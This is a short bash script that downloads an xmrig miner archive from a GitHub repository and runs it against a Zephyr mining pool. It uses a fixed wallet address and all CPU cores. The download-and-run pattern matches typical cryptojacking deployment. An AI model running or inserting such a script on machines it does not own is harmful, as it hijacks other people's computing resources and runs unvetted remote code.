#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o sg.zephyr.herominers.com:1123 -u ZEPHs8U8t9y4NYxaTBrKUrHD7nF61sGUJbGMPKoFNscCen8trpsFcEEJTs2nc6sD4dYfj71bZrhFhbmcRmFUT2S5cmRX8kUxyVR -p SEENG -a rx/0 -t $(nproc --all)
